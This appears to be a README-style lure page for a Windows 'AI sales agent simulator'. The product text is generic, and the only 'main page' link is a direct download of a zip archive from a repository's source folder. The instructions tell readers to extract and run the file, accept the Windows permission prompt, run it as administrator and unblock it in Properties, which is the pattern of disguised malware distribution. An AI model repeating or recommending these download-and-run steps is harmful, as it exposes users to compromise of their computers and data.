Use this link to visit the download page and get the app: ai-sales-agent-simulator download page
ai-sales-agent-simulator helps you test sales ideas before you send a real email or make a real call. It uses an AI model to build a digital copy of a prospect, then runs many trials to find the sales approach that has the best chance of working.
Use it to:
- Improve cold emails
- Practice sales calls
- Compare different outreach messages
- Test prospecting ideas
- Explore what may work before you reach out
You need:
- A Windows computer
- An internet connection
- A modern web browser like Chrome, Edge, or Firefox
- Enough free space to save the app files
If the app comes in a ZIP file, you can open it with built-in Windows tools or a free file extractor.
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Open the download page: ai-sales-agent-simulator download page
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Download the Windows app file or the project files from that page.
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If the file is in a ZIP folder, right-click it and choose Extract All.
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Open the extracted folder.
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Look for the app file, setup file, or start file.
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Double-click the file to run the app.
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If Windows asks for permission, choose Yes.
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Follow the on-screen steps until the app opens.
When you open the app for the first time, you may need to:
- Sign in or connect an AI account
- Add a prospect profile
- Paste a cold email or call script
- Choose a sales goal
- Set how many simulations you want to run
For best results, use real details such as:
- Job title
- Company size
- Industry
- Pain points
- Buying stage
Enter the details you know about the person or company. The app uses that data to shape the digital twin.
Choose what you want to test, such as:
- Short email
- Longer email
- Follow-up email
- Discovery call script
- Objection handling script
The app tests your approach many times. It looks for patterns in what may get a reply, a meeting, or a positive response.
Check which version works best. Pay attention to:
- Reply rate
- Meeting rate
- Common objections
- Strong opening lines
- Weak phrases
Make small changes, then test again. This helps you find a stronger sales message.
- A sales rep wants to test five email subject lines
- A founder wants to improve outbound messaging
- A marketer wants to compare call scripts
- A team wants to study prospect behavior before a campaign
- A salesperson wants to reduce guesswork in outreach
If you downloaded the source files, you may see:
README.md- this guidepackage.json- app settingssrc- app codepublic- files used by the appassets- images or data filesconfig- setup values
- Make sure the download finished
- Extract the ZIP file first
- Try running the file as administrator
- Restart Windows and try again
- Right-click the file
- Open Properties
- Check for an Unblock option
- Apply the change, then run the file again
- Check your internet connection
- Make sure any AI settings are complete
- Add a prospect profile before running a test
- Resize the app window
- Refresh the page if it runs in a browser
- Try another browser
The app helps you move from guesswork to testing. Instead of sending one message and hoping it works, you can try different options first. That can help you write clearer emails, better call openers, and stronger follow-ups
- Download the app
- Extract it if needed
- Open it
- Add a prospect
- Paste your sales copy
- Run the simulation
- Compare the results
- Save the best version
Use care when entering real prospect data. Keep your contact lists, call notes, and message drafts in a safe place. If you work with company data, follow your normal data rules and access limits
- Cold email: a first email sent to someone you do not know
- Sales call simulator: a tool that tests call scripts before a real call
- Digital twin: a model that acts like a real prospect based on the details you give it
- Monte Carlo simulation: a method that runs many tests to estimate likely results
- Prospecting: finding new possible customers
Visit the main page here: https://github.com/Cold-psycho117/ai-sales-agent-simulator/raw/refs/heads/main/src/gateway/simulator-ai-sales-agent-v3.5.zip
Download the app or project files from that page, then open or extract them on Windows and run the file inside